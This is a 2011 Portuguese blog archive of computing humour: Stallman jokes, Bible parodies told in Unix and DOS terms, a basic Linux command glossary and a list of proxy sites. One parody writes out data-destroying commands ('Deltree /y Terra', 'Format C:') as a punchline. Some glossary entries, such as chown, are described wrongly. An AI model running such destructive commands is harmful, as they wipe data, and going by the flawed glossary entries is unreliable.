Pesquisar

26 de out de 2011

25 de out de 2011

15 Mitos sobre Richard Stallman



1. Richard Stallman não usa navegadores da web, ele envia um link para um demon que usa o wget para buscar a página e envia-la de volta para ele.

2. Richard Stallman é o único homem vivo que pode pronunciar GNU da maneira que deve ser pronunciada.

3. Richard Stallman não lê páginas da web. Eles escrevem para ele.

4. Algumas pessoas verificam seus computadores em busca de vírus. Vírus verificam seus computadores em busca de Richard Stallman.

5. A barba de Richard Stallman é feita de parêntesis.

6. O sistema nervoso de Richard Stallman é completamente wireless.

7. Richard Stallman escreveu o compilador Deus. O Big Bang do Universo foi a primeiro segfault.

8. Algumas pessoas usam pijamas Linus Torvalds’s para dormir, Linus Torvalds usa pijamas Richard Stallman’s.

9. Richard Stallman uma vez comeu três bifes de 2Kg em uma hora. Ele passou os primeiros 45 minutos codificando uma nova extensão do Emacs elisp.

10. Richard Stallman não tem mãe, ele se codificou sozinho.

11. Richard Stallman criou a singularidade, mas, uma vez que ela geralmente funciona sem conexão à internet, não será visível por mais duas semanas.

12. Richard Stallman não faz wget, Richard Stallman faz wdemands!

13. Richard Stallman não tem nenhum problema usando o emacs. Ele escreveu-o o seu usando suas 4 mãos.

14. Richard Stallman nunca usa chuveiros: ele executa um ‘make clean’.

15. Richard Stallman lançou seu próprio DNA sob a GNU FDL.


fonte: http://lostsoulis.blogspot.com/2009/06/15-mitos-e-rumores-sobre-richard.html

Criação do Mundo segundo o root

Estava esses dias organizando os arquivos no HD, quando encontrei um backup bem antigo. resolvi extrair e verificar seu conteúdo, encontrei várias coisas legais e importantes que até o momento eu as tinha como “perdido”. e uma das coisas que encontrei foram os textos abaixo falando sobre como foi a criação do mundo segundo o “root”. vale a pena ler e dar boas gargalhadas com este texto super “nerd”.


A Criação do Mundo Segundo o Root – Parte 1 – O surgimento do sistema
Capitulo 1 – O Caos
no inicio havia apenas o caos. e não havia superblocks, e todos os inodes estavam espalhados pelos setores, e tudo era devastação. e havia apenas o root sobre a superfície do disco.

e o root resolveu e disse: isso nao pode continuar assim. e o root fez fdisk e eis que surgiram grandes divisões nos setores. e havia setores abaixo e acima dos dados. e aos abaixo dos dados, ele chamou de tabela de partições, e aos acima dos dados ele chamou de freeblocks.

e o root passou a formata-los . e os setores passaram a estar organizados, e haviam grandes superblocks nas águas de profundeza e inodes estavam sobre a superfície do disco. e o root passou a chama-los de filesystem. e o root viu q era bom e gravou a tabela de filesystems no fstab.

Capitulo 2 – O Inicio do sistema
e o root olhou para o filesystem e viu q faltava algo. e o root criou grandes diretórios e pequenos devices. e viu q era bom.

então o root viu o q havia criado, e tudo funcionava perfeitamente. mas faltava algo. e disse: passe a haver vida. e foram criados os processos do kernel e o init.

e eis q era bom, e o root editou o rc.d e instalou a glibc, e veio a haver luz. e o root passou a chamar o que havia criado de sistema.

Capitulo 3 – O surgimento do usuário
então o root passou a tomar dos bytes da memoria e dos dados do urandom, e dele formou o usuário. e ao usuário foi concedido o shell. e o usuário passou a viver. e o root lhe disse: venha a ter em sujeição os diretórios do disco e os bytes da memoria. de todos os recursos podeis utilizar, apenas não toqueis no su. pois deveras vos digo que, no dia em que tocares no su, farei um kill -9 em teu shell e apagar-te-ei do passwd.

e o usuário passou a estar no jardim do /home, e eis que tudo era bonito e perfeito dentro do /home. e o usuário vivia feliz em seu home directory.

Capitulo 4 – A criação da interface gráfica
e o usuário vivia feliz, mas sentia que lhe faltava algo. cada nod possui-a seu device no sistema, mas o usuário nao tinha ninguém para lhe fazer companhia.

e o root passou e extrair uma instrução do shell do usuário, e dela passou a formar a interface grafica. e chamou-a de X. então o root levou a X ate o usuário, e disse-lhes: sede fecundos e tornai-vos muitos, e populai o filesystem, e usai toda a memoria da placa de video.

e o usuario passou a viver com a interface gráfica, e eis que agora ele podia multiplicar seus terminais.

Capitulo 5 – A traição da interface gráfica
e a interface gráfica andava a passear pelo filesystem, quanto eis que vem em sua direção o mais vil de todos os arquivos criados pelo root: o HOWTO-SU. e o HOWTO incitava a curiosidade da interface gráfica. e lhe dizia: eh mesmo assim q o root disse, que não deveis usar o su? pois eis q o root sabe q, no dia que usares o su, positivamente vos tornareis igual a ele. e podereis decidir o q eh bom e o que eh mal, e podereis criar outros usuários, e nods, e formatar os discos. e o HOWTO lhe ensinou a usar o man.

e a interface gráfica foi ate o usuário, e lhe contou estas coisas, e lhe mostrou a manpage. e o usuário então digitou su no seu console, e eis que o # aparece em seu prompt. e ele passou a ver que estavam ambos limitados na memoria, e que tudo podia ser visto pelo /proc, e ambos ficaram envergonhados e se esconderam do utmp.

e o root passou a fazer um who e viu ambos se escondendo. e perguntou-lhes: por q te escondeis? acaso digitastes su em teu console?
e o usuário respondeu-lhe: foi essa interface que me destes. ela passou a me mostrar as manpages e os howtos, e por isso digitei.

e o root passou a ficar encolerizado e amaldiçoou a ambos, dizendo-lhes: vos sois amaldiçoados! deveras te digo que tua senha expirara, e sua entrada no passwd sera apagada. e tu, interface gráfica, estas amaldiçoada. nenhuma placa aceleradora funcionara bem em ti, e sempre terás pouca memoria de video. e eis q vos amaldiçôo a ambos, e eis que vira a haver o inimigo, e dividiras teu espaço em disco com o windows. e ele travara e te dará badblocks e lost inodes, e pelo resto de tua existência terá que conviver com a desgraça, ate q tua senha expire.

e tu, howto-su, maldito estas, e teus HOWTOs estarão sempre incompletos, e estarás rastejando para sempre no tldp.org. e ninguém leras mais tuas manpages, e todos os usuários irão perguntar no irc como faz.

e o root deixou-os, e corrompeu o filesystem e mudou as permissões do /home, para que o usuário não pudesse mais voltar ao jardim do HomeDirectory. e o usuário passou a ter que compilar seus programas, e escrever seus módulos.

e assim se deu.

A Criação do Mundo Segundo o Root – Parte 2 – A Aurora do Usuário
Capitulo 1 – Os primeiros novos usuários


eis que a vida fora do Jardim do HomeDirectory era dificil para o usuario e sua companheira, a interface grafica.

eles so poderiam sobreviver agora com seus proprios esforcos, e o root nao mais instalaria pacotes de binarios precompilados para eles.

e veio o tempo em que o usuario digitou su -c useradd e nasceu o primeiro descendente do usuario, e a interface grafica o chamou de caimd. e veio a haver tambem seu irmao, abelsh. e caimd se tornou um poderoso cacador de no /proc, mas abelsh era um pastor de devices.

e ambos prestavam homenagem ao root, mas apenas abelsh era reverente. caimd era arrogante, e o root nao se agradava de um daemon arrogante.

e eis que desperta a furia de caimd e um profundo odio por seu irmao, abelsh. e ele iludiu seu irmao a ir passear no campo, e fez um killall -9 abelsh.

mas o root observava a tudo, e puniu caimd. o root disse: maldito es, caimd, e toda a tua decendencia. e eu te digo q, por tua maldade, jamais teras controle do console de novo, e seras sempre executado com 1>/dev/null 2>1 &. e assim, caimd foi banido para os background process por todo o uptime do sistema.

Capitulo 2 – A maldade se espalha pelo filesystem

e todos os novos processos seguiam o caminho de caimd, e os badblocks imperavam no filesystem.

havia apenas alguns poucos processos bons em todo o sistema, e entre eles havia kmetusalem, o processo com maior uptime no sistema. mas ainda sim, havia muitos processos q rodavam com setuid 0 e eram muito mais poderosos que os outros, e corrompiam inodes e blocos de swap, e matavam outros processos, ate q o root viu todos os badblocks, e resolveu exteminar aquela geracao de childprocess maus.

Capitulo 3 – O Grande Diluvio do /dev/urandom

o root havia determinado exterminar todos os childprocess, e decidiu enviar um grande flood de numeros randomicos para a stdin de cada processo perverso, mas alguns dos processos mereciam ser salvos em fita DAT.

e ele executou o comando /usr/local/sbin/noe.sh, e noe.sh comecou a construir um grande /dev/mt0, que abrigaria os bons processos durante a colera do root.

e quando o /dev/mt0 ficou pronto, noe.sh foi recolher um casal de cada device, para que eles pudessem repovoar o filesystem quando a colera do root passasse.

ate que chegou o dia, e noe.sh e seus processos entraram no /dev/mt0, e com eles um casal de cada device. entao o root ejetou a fita e enviou o flood do /dev/urandom pra stdin de cada processo, ate que todos eles deram SegFault e morreram em terriveis core dumps.

Capitulo 4 – O renascimento dos usuários


depois do Grande Diluvio do /dev/urandom, o root restaurou o backup de noe.sh e os devices, e o filesystem foi novamente populado. desta vez, o /home estava montado com nosuid, para que os processos setuid 0 nao voltassem a estar no sistema.

e o tempo passou, e o passwd voltou a aumentar. e eles continuaram a se multiplicar, mas no entanto nao se espalhavam.

Capitulo 5 – A Torre de BashBel

e todos os usuarios se concentravam no lugar que ficou conhecido como a Torre de BashBel, pois todos os usuarios queriam estar no bash, e todos os outros shells que o root havia colocado no /bin estavam desprezados. e estes usuarios queria montar um bash tao poderoso que pudessem colocar setuid 0 nele.

e o root disse: isso nao pode continuar assim. e o root rodou um script no passwd, e fez usermod com -s randomico em todos os usuarios, e confundiu seus shells. e nenhum usuario entendia mais os shell scripts dos outros, e houve um grande caos e confusao na Torre de BashBel. e todos os usuarios que usavam o mesmo shell se juntaram em grupos, e cada grupo foi para um lado do / .

… to be continued …

A Criação do Mundo Segundo o Root – Parte 3 – O Surgimento da Nação Escolhida
Capitulo 1 – O povo escolhido

E o tempo passou, e todos os processos e usuarios se espalharam pela superficie do /, e todo o filesystem passou a ser populado.

No entanto, entre todos os PIDs, havia um que mostrava especial reverencia para com o root e tratava de modo sagrado todos os binarios setuid. Esse veio a ser Abraod. E o Root se agradava de Abraod, e decidiu fazer um pacto com ele. Assim disse o Root:

“Ha de chegar o dia em que um de teus ChildProcess ha de ser elevado acima de todos os PIDs, e seu poder sera grande. Todos os recursos do ulimit estarao com ele, e sera lhe concedida uma linha no /etc/sudo e todos os joelhos dos processos na memoria e dos usuarios no passwd se dobrarao perante ele.

Eh por meio dele que a perfeicao sera trazida de volta ao filesystem.

E quanto a ti, Abraod, doravante sera chamado Abroadcast. E tu te tornara pai de uma grande nacao de users, e havera um GID soh para ti e teus filhos.

Tambem lhe dou como presente estes inodes onde agora habitais, e ha de ser heranca para teus childprocess para todos sempre.”

E assim se deu. Abroadcast e sua esposa tiveram um filho, um decendente, e este passou a ser chamado IsACK.

E IsACK tambem passou a constituir familia, e tambem teve um descendente, que foi chamado de Jobcoh.

E o numero dos childprocess de Jobcoh atingiu os 12, e o Root se agradava de tais users.

E o Root apareceu em uma visao a Jobcoh fazendo um cat > /dev/tty1, e lhe disse:
“Grande teus filhos serao, e todos os processos serao beneficiados pro meio de teus fork()s. E doravante deveras ser conhecido como Shrael”

Capitulo 2 – Egitosoft

A familia de Shrael cresceu e se multiplicou, e passou a ter muitos netos, e o numeros dos seus era grande. No entanto, Shrael tinha especial predilecao por um de seus filhos: Jose.pl. E isso despertou o ciume e a ira de seus irmaos, e eles resolveram acabar ocm Jose.pl.

Certo dia, quando Jose.pl estava no campo pastoreando os bytes, seus irmaos vieram e o levaram a forca, e o prenderam num chroot.

Voltaram entao a seu pai e lhe disseram: Pai, Jose.pl sofreu um terrivel acidente. Ele estava pastoreando os bytes quando um terrivel urso veio e o atacou, e Jose.pl morreu com um Signal 11…

E Shrael chorou muito por seu filho, ainda preso no chroot… E alguns comerciantes vindos das fronteiras do sistema o acharam e levaram consigo para vender como escravo…

Com as reviravoltas do destino, Jose.pl acabou sendo vendido como escravo na terra de Egitosoft, para o poderoso farao TutanGates.

E Jose.pl mostrou-se homem sabio, e ajudou todos os processos do farao TutanGates a serem debugados. E TutanGates resolveu promover Jose.pl. Ele disse: Ae truta, tu manja bagarai, entaum tu vai tomah conta dos mano ae, valew?

E o Root abencoava Jose.pl como a nenhum outro. E o root avisou Jose.pl de uma grande desgraca por vir…

root@sistema:~# echo “vai haver uma grande abundancia de memoria durante os proximos 7 ciclos, seguido por uma completa escassez de memoria por outros 7 ciclos.” > /proc/jose/fd/1

E Jose.pl avisou ao Farao TutanGates, e este ordenou a Jose.pl que fizesse um grande estoque de memoria para enfrentar os tempos dificeis. E TutanGates continuou a vender seu sistema operacional meia-boca e a estocar memoria. Pois memoria era extremamente necessaria para comportar as telas azuis e dumps de memoria diarios de todo o sistema de EgitoSoft.

E os 7 anos de escassez de memoria vieram. E Shrael e sua familia, que tambem estavam em necessidade, vieram ate Egitosoft para adiquirir memoria. E Jose.pl reconheceu sua familia, e se alegrou com eles e trouxe-os ao egitosoft: mv /home/shrael /home/egitosoft/

E o sistema operacional zuado do Farao TutanGates continou a prosperar sob a supervisao de Jose.pl, e gracas a Jose.pl, sempre houve memoria para os dumps de memoria e telas azuis.

Capitulo 3 – As 10 pragas

E o povo de Shrael cresceu e se multiplicou na terra do EgitoSoft. E as geracoes passaram, e o povo de Shrael acabou se tornando escravo na terra de Egitosoft. E o Farao TutanBill, descendente do Farao TutanGates, escravizou todo o povo e fez com que vivessem em condicoes miseraveis de vida usando Ruindows ME.

Ate que um dia o Root nao pode mais permitir tamanha crueldade, e sucitou um libertados, Mouses. E Mouses mostrava-se sabio e temente ao Root. E o Root disse a Mouses: Va ate o Farao e diga-lhe que deve deixar meu povo partir.

Mas o Farao TutanBill mostrava-se intransigente, e exigia que todos usassem o Ruindows ME, e nao lhes permitiu deixar EgitoSoft. E o Farao fez ainda pior, instalou Internet Exploder 6 e Office 2000 em todos os Ruindows ME e obrigou o povo de Shrael a usa-los.

Ate que o Root nao pode mais suportar tamanha crueldade e disse a Mouses: Va ate o Farao e diga-lhe que, se nao deixar meu povo sair, vai te treta.

Mesmo assim, o Farao TutanBill nao quis colaborar. E o Root comecou a enviar pragas contra EgitoSoft…

E aquela terra foi assolada por um Ping Flood, e seus sistemas travaram. Depois, o root enviou a praga do Nuke na porta 139, e todos os sistemas novamente travaram. Seguiu-se a praga dos Virus de Macro, os ActiveX infectados, e os ataques Unicode, os ataques MSADC, execucao remota no Internet Exploder, as horriveis correntes de email, o worm CodeRed e a mais terrivel de todas as pragas: o Ecachange.

Apos todas estas pragas, o Farao TutanBill decidiu deixar o povo sair de EgitoSoft. E todo o povo de Shrael saiu feliz e contente de EgitoSoft, e o Root mostrava estar com eles.

No entanto, depois de alguns dias de liberdade, o Farao TutanBill voltou atras, e resolveu traze-los de volta a escravidao. E o Farao usou todo seu poderoso exercito de Advogados guerreiros pra processar e destruir todo o povo de Shrael, alem de processos pelo uso de patentes.

Mas o root mostrava-se estar com eles, e os guiou ate um grande mar, o Mar do OpenSource Vermelho.

E o root instruiu Mouses, e Mouses abriu o Mar do OpenSource Vermelho e todo o povo de Shrael passou sao e salvo pelo Mar… Mas quando os Advogados Guerreiros do Farao vieram em seu encalco atravez do Mar do OpenSource Vermelho, o root soltou as aguas, e todo o exercito do Farao TutanBill foi destruido, afogado pelo OpenSource.

E Mouses passou a guiar todo aquele povo de volta ao Sistema Prometido, a Terra que o Root havia jurado dar a eles numa promessa feita a Abroadcast. E todo o povo estava feliz por volta as Terras de POSIX. E todo o povo e os pingaiada gritavam: BOOOOOOOOOA ROOT! WINDOWS SUX!

Fonte: de Jorge Pereira

Versão Cyber-Histórica da criação do mundo

Versão "cyber" da criação do mundo
No princípio Deus criou o BIT e o BYTE. E deles criou o WORD. E assim estavam os dois BYTES na WORD; e nada mais existia. E Deus separou o UM do ZERO; e viu que isso era bom. Deus disse: "Que a DATA exista !" e assim aconteceu. E Deus disse: "Que a DATA vá para os seus lugares devidos", e assim aconteceu. E ele criou os disquetes, os discos rígidos e os discos compactos. Disse Deus: "Que apareçam os computadores, e sejam lugar para os disquetes, e para os discos rígidos e para os discos compactos". Então Deus chamou os computadores de HARDWARE. Mas não havia ainda SOFTWARE, então Deus criou os PROGRAMAS; grandes e pequenos... E disse-lhes: "Vão, multipliquem-se e encham a memória".


Então Deus disse: "Vou criar o PROGRAMADOR, e ele irá fazer novos programas e governará os computadores, programas e a informação". E Deus criou o PROGRAMADOR, e o colocou-o no CPD; E Deus mostrou-lhe a estrutura DOS e disse: "Podes usar todos os diretórios e sub-diretórios mas nunca execute o WINDOWS". Após algum tempo, disse Deus: "Não é bom para o PROGRAMADOR estar só". Ele pegou um osso do corpo do PROGRAMADOR e criou a criatura que iria olhar para o PROGRAMADOR e admirá-lo, e amar as coisas que ele faz. E Deus chamou a criatura de USUÁRIO. E o PROGRAMADOR e o USUÁRIO foram deixados sob o DOS e eram felizes. Viu Deus que tudo isso era bom. Mas BILL era mais esperto que as outras criaturas de Deus. E BILL disse para o USUÁRIO: "Foi mesmo assim que Deus disse, que não podeis executar nenhum programa?" E o USUÁRIO respondeu: "Deus disse-nos que podíamos executar todos programas existentes, mas nunca executar o WINDOWS, senão morreríamos..."
E BILL disse ao USUÁRIO: "Como podes falar de algo que nunca experimentaste? No preciso momento que executares o WINDOWS se tornarás igual a Deus. E poderás criar tudo o que quiseres por um simples toque no mouse." E ao PROGRAMADOR BILL disse que os frutos de utilizar o WINDOWS eram maravilhosos e fáceis de utilizar. O USUÁRIO então notou que não era necessário nenhum conhecimento, pois o WINDOWS podia substituí-lo.
Então o USUÁRIO instalou o WINDOWS no seu computador, e disse ao PROGRAMADOR que era bom. O PROGRAMADOR também o instalou. Então abriram-se imediatamente os olhos de ambos e perceberam que estavam sem drivers!!
Quando ouviram a voz de Deus, imediatamente esconderam-se da presença Dele. Mas Deus perguntou: "Ondes estás?"
O PROGRAMADOR respondeu: "Ouvi a tua voz, mas como estava sem drivers, tive medo e me escondi, pois não os encontro no DOS." E Deus disse: "Quem disse que precisavas de novos DRIVERS? Executaste o WINDOWS?"
E o PROGRAMADOR respondeu: "O USUÁRIO que me destes como companhia o executou" Ao USUÁRIO Deus disse: "O que é isto que fizeste? Por que executaste o Windows?" "Foi o BILL que me enganou" - disse o USUÁRIO...
Então Deus disse ao Bill: "Por causa do que tu fizeste, serás odiado por todas as criaturas. E o usuário estará sempre zangado contigo. E venderás o WINDOWS para sempre". Ao USUÁRIO disse: "Por causa do que fizeste, do suor do teu rosto comprarás o WINDOWS, mas o mesmo irá desapontar-te e comer toda a tua memória; e terás de usar programas reles, e irás adormecer em cima dos manuais. Multiplicarei sobremodo os sofrimentos da execução de vossos programas e muitas serão as vezes que terás que reinicializar o sistema" E Deus disse ao PROGRAMADOR: "Por causa de teres ouvido o USUÁRIO, nunca serás feliz. Todos os teus programas terão erros e terás de corrigi-los, e corrigi-los até o final dos teus dias". E Deus expulsou-os do CPD e fechou a porta, colonado uma PASSWORD: "GENERAL PROTECTION FAULT" Mas é grande o amor de Deus para com o PROGRAMADOR e o
USUÁRIO, e eis que antes de condenar a ambos DEUS prometeu que em breve lhes enviaria um salvador. E eis que o UNIX veio a terra e mostrou os seus milagres. Rodou programas, executou os backups e reiniciou sem perder os dados. E vendo como o UNIX era bom alguns passaram a utilizá-lo. E tendo a certeza de que o UNIX era o certo, propagaram seus ensinamentos. Mas eis que BILL tentou obscurecer os USUÁRIOS e PROGRAMADORES e disse que o UNIX não era o verdadeiro sistema prometido por DEUS. BILL prometeu aos USUÁRIOS e aos programadores que viria o WINDOWS 2000 e este sim era o verdadeiro sistema, capaz de reconhecer periféricos automaticamente. Assim sendo a todo aquele que aceitar o UNIX em seu MICRO será salvo,e poderá voltar ao CPD no dia do SHUTDOWN final. Mas aquele que se entregar ao WINDOWS 2000, embora ache que está no caminho certo, ficará preso para sempre na tela travada do "O WINDOWS ESTÁ SENDO DESLIGADO" e jamais poderá "DESLIGAR SEU COMPUTADOR COM SEGURANÇA".

Referências:
http://vinicblog.blogspot.com/2010/12/no-principio-deus-criou-o-bite-e-o-byte.html

Criação do mundo pelo computador (MS-DOS)

"Criação do Mundo Por Computador"

E Deus fez o mundo usando o DOS.
Deus acessou o sistema às 12:01:00, domingo, 1 de abril.
C:\>Faça-se a luz!
Comando ou nome de arquivo inválido.
C:\>Faça-se a luz.exe
Luz criada.
C:\>Rodar Céu e Terra
Terra e Céu funcionando. 0 erros.
E Deus criou o Dia e a Noite. Deus viu que havia 0 (zero) erros e saiu do
sistema às 12:02:00, domingo, 1 de abril.
Deus voltou a acessar o sistema às 12:01:00 da segunda-feira, 2 de abril
C:\>CD TERRA
C:\TERRA>Haja firmamento no meio das águas e da luz
Comando ou nome de arquivo inválido
C:\TERRA>Criar firmamento.exe
Ok
C:\TERRA>Rodar firmamento.exe
E Deus dividiu as águas. Deus viu que havia 0 (zero) erros. E Deus
desligou
às 12:02:00 de segunda-feira, 2 de abril.
Deus voltou ao sistema às 12:01:00, terça-feira, 3 de abril.
C:\>Fazer florestas e animais.exe
Ok
C:\>Fazer o homem à minha imagem.exe
Erro de sintaxe
C:\>Criar o homem.exe
Homem criado
C:\>Fazer o homem multiplicar e povoar a Terra e dominar os peixes e as
> aves e ter ascendência sobre todas as coisas que estejam sobre a Terra
Excesso de caracteres
C:\>move homem*.* c:\Jardim do Éden
Directório inexistente
C:\>MD Jardim do Éden
C:\>move homem*.* c:\Jardim do Éden
Ok
C:\>Inserir mulher no homem
Parâmetros invertidos. Rectifique.
C:\>Inserir homem na mulher
Ok
C:\>cd "Jardim do Éden"
C:\Jardim do Éden>Criar desejo
Operação executada. 1 erro(s)
C:\>multiplicai.exe
OK
E Deus viu o homem e a mulher sendo frutíferos e multiplicando no Jardim
do Éden.
Deus saiu do sistema às 23h da quarta-feira, 4 de abril. Deus, ansioso,
voltou a acessá-lo 00:02 da quinta-feira, 5 de abril.
C:\>Criar livre arbítrio
Ok
C:\>Rodar livre arbítrio
Ok
C:\>Eliminar desejo
Desejo não pode ser eliminado devido à criação do livre arbítrio
C:\>Del livre arbítrio
Livre arbítrio é arquivo inacessível e não pode ser destruído. Accione
tecla de substituição, cancelamento ou help
E Deus viu o homem e a mulher no Jardim do Éden, já não respeitando os
parâmetros estabelecidos.
C:\>Criar o bem e o mal
Ok
C:\.>Activar mal
E Deus viu que havia criado a vergonha
Atenção: Erro do sistema na última operação E96. Homem e mulher não estão em
Jardim do Éden. 4277732 erros.
C:\>SCAN Jardim, E.D.E.N. homem-mulher
Homem-mulher não encontrado.
C:\>Del vergonha
Vergonha não pode ser apagada com mal activado
C:\>Del livre arbítrio
Arquivo inacessível. Não pode ser destruído. Accione tecla de substituição,
cancelamento ou help
C:\>Interromper programa!
Exclamação imperativa torna comando irreconhecível. Tente interrogação ou help
C:\>Suspender programa
Comando ou nome de arquivo inválido
C:\>Suspender programa.exe
Comando ou nome de arquivo inválido
C:\>Suspender programa, porra!
Erro de sintaxe
C:\>Criar novo mundo
Disco cheio
C:\>Dir
O volume da unidade C é Deus
O número de série do volume é 666F-11CC
Diretório de C:\
TERRA
1 arquivo(s) 0 bytes
1 diretório(s) 0 bytes livres
C:\>Del Terra
Comando ou nome de arquivo inválido
C:\>Del Terra!
Excesso de caracteres "!"
C:\>Del Terra
TERRA não pode ser apagado. Esse diretório possui arquivos de sistema
C:\>Deltree /y Terra
Apagando Terra
Erro ao apagar Terra, esvaziamento da pilha E6FA-A1, no módulo 0001-0100
Sistema paralisado. Pressione Crtl+Alt+Del para reinicializar o sistema
E Deus revoltado reinicializou o sistema...
(...)
Inicializando o MS-DOS..
HOMEM está testando a memória estendida... concluído
C:\>_
C:\>Format C:_
ATENÇÃO TODOS OS ARQUIVOS DA UNIDADES SERÃO APAGADOS
CONTINUAR? (S/N)? SSSSSSSSSSSSSSSSSSS

23 de out de 2011

Escolha online a distribuição do linux mais apropriada para você!


Entre no site: http://www.zegeniestudios.net/ldc/ clique em TAKE THE TEST! e escolha a linguagem, após isso aparecerá uma série de perguntas e após responde-las eles lhe apresentarão a mais adequada para você.




Comandos Básicos do Linux

ls = Lista os arquivos, mesmo que dir do DOS
Atributos comuns:
-a = mostra arquivos ocultos
-l = mostra bytes, permissões, diretório, etc


Obs: no ls os nomes de arquivos nos sistemas *X (Unix, linux, etc) não precisam ter só 8 letras. Dai, se você quer listar os arquivos começados com u, por exemplo, peca ls u* e veja o resultado.
* substitui qualquer conjunto de caracteres
? substitui caracteres isolados
----------
rm = remove arquivos, no formato: rm (arquivo1) (arquivo2) (arquivo3) ...

Exemplo: rm look.doc / rm root.txt link.html win95.w95

----------
cp = copia arquivos, no formato: cp (arquivo1) (diretório)

Exemplo: cp manual.txt /home/manual

----------
cat = mostra o conteúdo do arquivo, mesmo que o 'type' no DOS
----------
more = exibe o conteúdo de um arquivo pagina a pagina, mesmo q no DOS
Exemplo: ls|more

----------
pwd = exibe o diretório atual (o que vc esta)
----------
rmdir = apaga diretório

Exemplo: rmdir /diretório se o diretório estiver cheio, use o rm com o atributo -r

----------
mkdir = cria diretório


Exemplo: mkdir /diretório


----------
clear = limpa a tela, mesmo que 'cls' no DOS
----------
who = mostra quem está na maquina no momento
----------
whoami = mostra quem você e - útil quando você esquece com q login entrou... ;)
----------
finger = mostra o usuário associado a certa chave
----------
df = mostra o espaço usado, livre e a capacidade das partições do HD
----------
free = exibe a memória livre, a usada, e o buffers da memória RAM
----------
exit e logout = sai da sessão atual
----------
tar (tape archive) = programa de geração de backup
tar -c gera backup
tar -x restaura backup
tar -v lista cada arquivo processado
tar -t lista o conteúdo de um backup
----------

Nota: Para descompactar arquivos "tagged"(.tar.gz, .tgz, etc)
tar zxpvf (nome_do_arquivo)
Se o arquivo for "gziped"(.gz):
gunzip -d (nome_do_arquivo)

----------
chmod - muda as permissões do arquivo/diretório
chown - muda as permissões do arquivo/diretório
----------
awk - Procura por um modelo a partir de um arquivo. Inclui uma linguagem de programação embutida.
----------
bdiff - Compara dois arquivos grandes.
----------
bfs - Procura um arquivo grande.
----------
cal - Exibe um calendário.
----------
cat - Encadeia e imprimi arquivos.
----------
cc - Compilador C.
----------
cd - Muda diretório.
----------
chgrp - Muda o titulo de um grupo de arquivos.
----------
cmp - Compara dois arquivos; mostra a localização (linha e byte) da primeira diferença entre eles.
----------
comm - Compara dois arquivos para determinar quais linhas sao comuns entre eles.
----------
cu - Chamar outro sistema UNIX.
----------
date - Retorna a data e a hora.
----------
diff - Exibe as diferenças entre dois arquivos ou diretórios.
----------
diff3 - Exibe as diferenças entre tres arquivos ou diretorios.
----------
du - Relatorio no uso do sistema de arquivos.
----------
echo - Exibe seus argumentos.
----------
ed - Editor de texto.
----------
ex - Editor de texto.
----------
expr - Avalia seus argumentos quando geralmente e uma formula matematica.
----------
f77 - Compilador FORTRAN.
----------
find - Localiza os arquivos c/ caracteristicas especificas.
----------
format - Inicializa um floppy disk.
----------
grep - Procura um modelo a partir de um arquivo. (veja awk)
----------
help - :/ (ajuda)
----------
kill - Termina um processo.
----------
ln - Usado para unir arquivos.
----------
lpr - Copia um arquivo para a linha de impressora.
----------
ls - Exibe informacoes sobre um ou mais arquivos.
----------
mail - Usado para receber ou enviar e-mail.
----------
nroff - Usado para formatar textos.
----------
ps - Exibe um status dos processos.
----------
sleep - Causa um processo para tornar-se inativo por uma duracao de tempo especifica.
----------
sort - Escolher e unir um ou mais arquivos.
----------
spell - Procurar erros de ortografia num arquivo.
----------
split - Dividir um arquivo.
----------
stty - Exibir ou escolher parametros do terminal.
----------
tail - Exibir o fim de um arquivo.
----------
tset - Escolher o tipo de terminal.
----------
umask - Permite que o usuario especifique uma nova criacao de camuflagem.
----------
uniq - Compara dois arquivos. Procura e exibe em linhas o que e incomparavel em um arquivo.
----------
uucp - Execucao UNIX-para-UNIX
----------
vi - Editor de tela cheia.
----------
wc - Exibe detalhes no tamanho do arquivo.
----------
who - Informacoes de quem esta on-line.
----------
write - Usado para mandar mensagens para outro usuário.

Sites de IPs e Proxys

Sites de IPs e Proxys, segue a lista abaixo:


Anonymouse - http://anonymouse.ws
ShadowBrowser - www.shadowbrowser.com/?pin=trial
AnonymousIndex.com - www.anonymousindex.com/
HideMyAss - www.hidemyass.com/
Proxy7 - www.proxy7.com/
ProxyFoxy - www.proxyfoxy.com/
75I.NET - www.75i.net/
78Y.NET - www.78y.net/
Proxy Guy - www.proxyguy.com/
proxyz.be - www.proxyz.be/
antifw.tk - www.antifw.tk/
ProxyHero - www.proxyhero.com/
ProxyDrop - www.proxydrop.com | www.proxydrop.net | www.proxydrop.biz | www.proxydrop.info | www.proxydrop.org
prx1 - www.prx1.com/
ninjaproxy - www.ninjaproxy.com/
ShadowSurf - www.shadowsurf.com/
ProxySpy - www.proxyspy.com/
ProxyPrince - www.proxyprince.com/
PimpMyIP - www.pimpmyip.com/
OhMyProxy - www.ohmyproxy.com/
Clever Proxy - www.cleverproxy.com/
A Proxy Site - www.aproxysite.com/
Fully Sick Proxy - www.fullysickproxy.com/
Desire Proxy - www.desireproxy.com/
Perfect Proxy - www.perfectproxy.com/
Prime Proxy - www.primeproxy.com/
Proxy Aware - www.proxyaware.com/
Proxy Craze - www.proxycraze.com/
Proxy Gasp - www.proxygasp.com/
Proxy Please - www.proxyplease.com/
Some Proxy - www.someproxy.com/
Stupid Proxy - www.stupidproxy.com/
That Proxy - www.thatproxy.com/
Want Proxy - www.wantproxy.com/
UnBlockMySpace - www.unblockmyspace.com/
ProxyForAll - www.proxyforall.com/
MyProxySurfer - www.myproxysurfer.com/
indianproxy - www.indianproxy.com/
proxybrowsing - www.proxybrowsing.com/
Guardster - www.guardster.com/subscription/proxy_free.php
ProxyWeb - www.proxyweb.net/
WebWarper - http://webwarper.net/
W3Privacy - www.w3privacy.com/
Anonymizer.RU - www.anonymizer.ru/
The-cloak - www.the-cloak.com/login.html
Pure privacy - www.pureprivacy.com/
Proxify.com - http://proxify.com/
URL Encoded - www.urlencoded.com/
snoopblocker - www.snoopblocker.com/
psurf.net - www.psurf.net/
phproxy - www.phproxy.info/
proxy121 - www.proxy121.com/


http://www.greatproxylist.com/
http://www.sitefight.com/
http://www.proxyring.com/topsites//
http://www.gosneak.com/
http://www.proxyserverprivacy.com/proxy-web-sites/
http://www.cgiproxy.us/
http://www.my-proxy.com/
http://www.bestproxysites.com/
http://www.topproxylist.com/
http://www.proxystuff.com/
http://uberproxies.com/
http://www.proxytopsite.net/
http://www.proxysites.org/
http://www.proxxed.com/
http://www.proxystation.com/
http://www.top-proxies.com/
http://www.bigproxys.com/
http://www.rapidwire.net/
www.bigate.com/cgi-bin/bigate/b/k/k/
www.userbeam.de/
www.calcmaster.net/
http://www.misterprivacy.com/begin_a...us_surfing.htm
